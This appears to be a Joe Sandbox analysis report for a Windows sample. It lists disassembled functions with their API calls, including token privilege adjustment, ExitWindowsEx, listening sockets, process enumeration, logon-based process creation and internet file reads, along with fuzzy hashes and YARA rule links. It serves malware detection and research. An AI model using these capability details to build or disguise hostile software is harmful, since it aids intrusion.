API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 4ef5aba4c4f198e1af36a77d192fa6f30a2f6e4a608df2c7e01c879d633dead0
Instruction ID: bbc303e0f1f06f5e70bf642a146e3d5e7798f2cf3b2265c04baa291a3e5b843e
Opcode Fuzzy Hash: 4ef5aba4c4f198e1af36a77d192fa6f30a2f6e4a608df2c7e01c879d633dead0
Instruction Fuzzy Hash: DF316D350083859FC312EB24C891DAFB7E8AE95304F408E2DF4D59A191EB21DE08CB67

Function 003C51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 003B87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003B882B
Part of subcall function 003B87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003B8858
Part of subcall function 003B87E1: GetLastError.KERNEL32 ref: 003B8865

ExitWindowsEx.USER32(?,00000000), ref: 003C51F9

Strings

, xrefs: 003C51E7
SeShutdownPrivilege, xrefs: 003C51C9
@, xrefs: 003C51EC

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: bfe4ef4543ada4581c93fd558b8ab433e9e50c9c8c6b90f51fa1a9ec38782709
Instruction ID: 9a056b0ed1bf8762705fc0b9135c59211e9e63300703fe58e0b8c2724b274abc
Opcode Fuzzy Hash: bfe4ef4543ada4581c93fd558b8ab433e9e50c9c8c6b90f51fa1a9ec38782709
Instruction Fuzzy Hash: 7E01F7316916156BF72A62689C8BFBB72DC9B05350F250D2DF913EA4D2DA917C808790

Function 003D6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 003D62DC
WSAGetLastError.WSOCK32(00000000), ref: 003D62EB
bind.WSOCK32(00000000,?,00000010), ref: 003D6307
listen.WSOCK32(00000000,00000005), ref: 003D6316
WSAGetLastError.WSOCK32(00000000), ref: 003D6330
closesocket.WSOCK32(00000000), ref: 003D6344

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 3dfc249c53a96143c35ceb34388db98b9be734219a744a0184c50a8952b68ef9
Instruction ID: d11df50490c904097e89bfbf57c3595d6cd76563e81eb792cea51377425fa059
Opcode Fuzzy Hash: 3dfc249c53a96143c35ceb34388db98b9be734219a744a0184c50a8952b68ef9
Instruction Fuzzy Hash: 6321D5756002009FCB12EF64D886B6EB7ADEF49310F15825AE926AB3E1C770AD01CB51

Function 003B85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003B85E2
OpenProcessToken.ADVAPI32(00000000), ref: 003B85E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003B85F8
CloseHandle.KERNEL32(00000004), ref: 003B8603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003B8632
DestroyEnvironmentBlock.USERENV(00000000), ref: 003B8646

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 4be3e7264e04a3dbff1430b5f859fbf088bd66d9f916776c8fa7a66cb9c86b55
Instruction ID: 8e2ffa918cedae5555949bee5920ee5d7d5cdcacade38d2f3394287cee096c67
Opcode Fuzzy Hash: 4be3e7264e04a3dbff1430b5f859fbf088bd66d9f916776c8fa7a66cb9c86b55
Instruction Fuzzy Hash: 4B11387250124DAFDF128FA4DD49BEA7BADEB48348F054165BE04A61A0C6719E60DB60

Function 00375520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00380DB6: std::exception::exception.LIBCMT ref: 00380DEC
Part of subcall function 00380DB6: __CxxThrowException@8.LIBCMT ref: 00380E01

_memmove.LIBCMT ref: 003B0258
_memmove.LIBCMT ref: 003B036D
_memmove.LIBCMT ref: 003B0414

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: fefc19f82d9c44d92cbb4446c17d1ef663174da88f9b0f7c523a26e0c099cf77
Instruction ID: e7030ff1f551176c258e9db48c84a047f9f8206b150366991dba1e60659b671b
Opcode Fuzzy Hash: fefc19f82d9c44d92cbb4446c17d1ef663174da88f9b0f7c523a26e0c099cf77
Instruction Fuzzy Hash: 6902D070A00209DBCF1ADF64D981AAEBBF5EF44304F14C4A9E90ADF255EB34DA54CB91

Function 00361287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623

DefDlgProcW.USER32(?,?,?,?,?), ref: 003619FA
GetSysColor.USER32(0000000F), ref: 00361A4E
SetBkColor.GDI32(?,00000000), ref: 00361A61

Part of subcall function 00361290: DefDlgProcW.USER32(?,00000020,?), ref: 003612D8

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: d94e9e0979bf1f12dcd6157da80db4e9d1a18f2323e1231f28e1f492c619cac9
Instruction ID: 5f907445d8b3ffbbaab8e8a951601563a118acfc099c7982cf3abef1332a4d54
Opcode Fuzzy Hash: d94e9e0979bf1f12dcd6157da80db4e9d1a18f2323e1231f28e1f492c619cac9
Instruction Fuzzy Hash: 2BA19B70112594BEEA3BAB69DC48EBF259CDB42346F1E8219F402DA5DACB208D01C2B5

Function 003D6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 003D7D8B: inet_addr.WSOCK32(00000000), ref: 003D7DB6

socket.WSOCK32(00000002,00000002,00000011), ref: 003D679E
WSAGetLastError.WSOCK32(00000000), ref: 003D67C7
bind.WSOCK32(00000000,?,00000010), ref: 003D6800
WSAGetLastError.WSOCK32(00000000), ref: 003D680D
closesocket.WSOCK32(00000000), ref: 003D6821

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 4f9000c5340b27b99968b785bacd278881ae663bd14ff4a058a6335843254fd7
Instruction ID: f7413fc8082be1498eb8ad028a30d2440433fbefae96ce790256fa8871ef1598
Opcode Fuzzy Hash: 4f9000c5340b27b99968b785bacd278881ae663bd14ff4a058a6335843254fd7
Instruction Fuzzy Hash: 4341C375A00214AFDB12AF64DC87F6E77EC9B09754F04C55AF91AAF3D2CA709D0087A1

Function 003E5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 003E53C5
IsWindowEnabled.USER32 ref: 003E53D3
GetForegroundWindow.USER32(?,?,00000001), ref: 003E53E0
IsIconic.USER32 ref: 003E53EE
IsZoomed.USER32 ref: 003E53FC

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 36c398d8b0b2e83a8511405c972fa9d66543a36f615d426aa198465484396347
Instruction ID: ab493fdfef19afc6c91880952be4fb18116df50b1c30f69a898f0d8ad58c1521
Opcode Fuzzy Hash: 36c398d8b0b2e83a8511405c972fa9d66543a36f615d426aa198465484396347
Instruction Fuzzy Hash: B111B6717009A19FDB235F279C84B6ABB9CEF457A5B418529F845DB2C1CBB09C018AA4

Function 003B80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003B80C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003B80CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003B80D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003B80E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003B80F6

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: c55101aae65d84c54d75bc6d9067dee08f4d4fb493d73e03aecf62064bae7107
Instruction ID: 0e6a5faadfd1cc10f6bfeee04cec6bd4e66f3864c200580fcf4f2a09bd990e2f
Opcode Fuzzy Hash: c55101aae65d84c54d75bc6d9067dee08f4d4fb493d73e03aecf62064bae7107
Instruction Fuzzy Hash: 53F06835241244AFD7224F65DCCDEA73BACEF85759F010125F645C6190CBA1DD41DA60

Function 00364B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00364AD0), ref: 00364B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00364B57

Strings

kernel32.dll, xrefs: 00364B40
GetNativeSystemInfo, xrefs: 00364B51

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 2214c2da4dec49ee4ac0009f4b89033732fa81b17f09035e155d5c29f4f0b9a9
Instruction ID: 690784e3201b56e1d8f5fc11a7d29827e168ee9fc23a4fcac2b2af2602a963a6
Opcode Fuzzy Hash: 2214c2da4dec49ee4ac0009f4b89033732fa81b17f09035e155d5c29f4f0b9a9
Instruction Fuzzy Hash: 0CD01234E10767CFDB229F32D858B4676D8AF45351F11C93DD4C6DA190D6B0D480C654

Function 003DEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 003DEE3D
Process32FirstW.KERNEL32(00000000,?), ref: 003DEE4B

Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22

Process32NextW.KERNEL32(00000000,?), ref: 003DEF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 003DEF1A

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: f8ec537205f1b09776748829f8385345db73843792a114918df75834896cbf5f
Instruction ID: 1110e38078146f551e7dd7c6d5b85c7e31b673d92016d8ab95c851c1d41bdb9d
Opcode Fuzzy Hash: f8ec537205f1b09776748829f8385345db73843792a114918df75834896cbf5f
Instruction Fuzzy Hash: 435171725043119FD322EF24DC81E6BBBE8EF94750F50892DF5959B2A1DB70A904CB92

Function 003BE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 003BE628

Strings

|, xrefs: 003BE658
(, xrefs: 003BE66E

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: d2e871282e86f2ae9a420910ffdd7f35e95bd7b7976cb18900ee320335f1a13a
Instruction ID: ddeb71de55b567756b80559fecca5180ae7c1a16f6756a7d1276b82c98d416dd
Opcode Fuzzy Hash: d2e871282e86f2ae9a420910ffdd7f35e95bd7b7976cb18900ee320335f1a13a
Instruction Fuzzy Hash: C6324675A007059FD729CF19C481AAAB7F0FF48314B12C56EE99ADB7A1EB70E941CB40

Function 003D22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003D180A,00000000), ref: 003D23E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 003D2418

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 84e8c3bcdbadac49aaa662d29391c2fd4b860d00faeef370c6f597138f974a70
Instruction ID: 35df0148ad072df9f91b482bbe9a68da421672256eabe901960767c8332e9e48
Opcode Fuzzy Hash: 84e8c3bcdbadac49aaa662d29391c2fd4b860d00faeef370c6f597138f974a70
Instruction Fuzzy Hash: 7341F776904309BFEB22DE96EC81EBB77BCEB50314F10406BFA01A6740DA759E419650

Function 003CB333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 003CB343
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003CB39D
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 003CB3EA

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: d4b7c6f56c3e75af211058d738ca86988f3eb6f45e0a45852470c9896986754e
Instruction ID: d86032159247edca225688d0f8bb485f5316250ba191b69ad1f3c75757916066
Opcode Fuzzy Hash: d4b7c6f56c3e75af211058d738ca86988f3eb6f45e0a45852470c9896986754e
Instruction Fuzzy Hash: 5D215C75A00508EFCB01EFA5D881EEDBBB8FF49314F1481AAE905EB355CB31A915CB51

Function 003B87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00380DB6: std::exception::exception.LIBCMT ref: 00380DEC
Part of subcall function 00380DB6: __CxxThrowException@8.LIBCMT ref: 00380E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003B882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003B8858
GetLastError.KERNEL32 ref: 003B8865

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 6c4d0b918713f799327cde660193b4163d3b0e39056267dba212f69bbffb7452
Instruction ID: aa242cb84a11beee5b9da12d53a59a0890bd94cfdc77ddc9cbf908fc5450c5ee
Opcode Fuzzy Hash: 6c4d0b918713f799327cde660193b4163d3b0e39056267dba212f69bbffb7452
Instruction Fuzzy Hash: 70119DB2414304AFE729EFA4DC85D6BB7ADFB44314B20852EF45587651EA70BC04CB60

Function 003B874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003B8774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003B878B
FreeSid.ADVAPI32(?), ref: 003B879B

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 6fb0085660597593d6cc54980098a3eb455b1decca8d21d9dbecc21f76d33a66
Instruction ID: 43e82a9e57bd10509ad5eb88169c3c80034b4643170712c07251b09a700baa2a
Opcode Fuzzy Hash: 6fb0085660597593d6cc54980098a3eb455b1decca8d21d9dbecc21f76d33a66
Instruction Fuzzy Hash: CAF04975A1130CBFDF10DFF4DC89ABEBBBCEF08311F1045A9AA01E6581E6716A048B50

Function 003C8889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 003C889B

Part of subcall function 0038520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,003C8F6E,00000000,?,?,?,?,003C911F,00000000,?), ref: 00385213
Part of subcall function 0038520A: __aulldiv.LIBCMT ref: 00385233

Strings

0eB, xrefs: 003C8892

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0eB
API String ID: 2893107130-1534231516
Opcode ID: 4bcfaa03c87d9f14309691819c12892384edc3a2f11ca1f504f40666854174ba
Instruction ID: 4c0d334efea22ed266afc9c90f27bbaa2a661a5d41be218dc8cfca723f0b0471
Opcode Fuzzy Hash: 4bcfaa03c87d9f14309691819c12892384edc3a2f11ca1f504f40666854174ba
Instruction Fuzzy Hash: 7C21A2326256108BC729CF29D841B52B3E1EFA5311BA98E6CD0F5CB2C0CA74AD45CB54

Function 003CC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 003CC6FB
FindClose.KERNEL32(00000000), ref: 003CC72B

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f852ac380d2bfc4b9ce01337c29451fae6412b27b5048ef2eeffd281f48710ce
Instruction ID: e215cead3bd065fbeff468ef97beb8ba34ad8b0851e6bebd4cce988423287fd1
Opcode Fuzzy Hash: f852ac380d2bfc4b9ce01337c29451fae6412b27b5048ef2eeffd281f48710ce
Instruction Fuzzy Hash: 6D1182756002009FDB11DF29C885A2AF7E8EF45324F00C51EF9A9CB291DB70AC05CB81

Function 003CA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,003D9468,?,003EFB84,?), ref: 003CA097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,003D9468,?,003EFB84,?), ref: 003CA0A9

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

